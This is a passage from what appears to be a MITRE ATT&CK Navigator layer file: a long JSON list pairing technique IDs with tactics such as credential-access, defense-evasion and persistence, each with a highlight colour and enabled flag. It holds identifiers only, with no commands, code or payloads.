{"techniqueID": "T1085", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1138", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0045", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1018", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1490", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1046", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1118", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1121", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1123", "tactic": "collection", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1083", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1135", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0009", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1081", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1220", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0035", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1123", "tactic": "collection", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1082", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1042", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0049", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0049", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0016", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1223", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1489", "tactic": "impact", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0189", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1124", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1500", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": 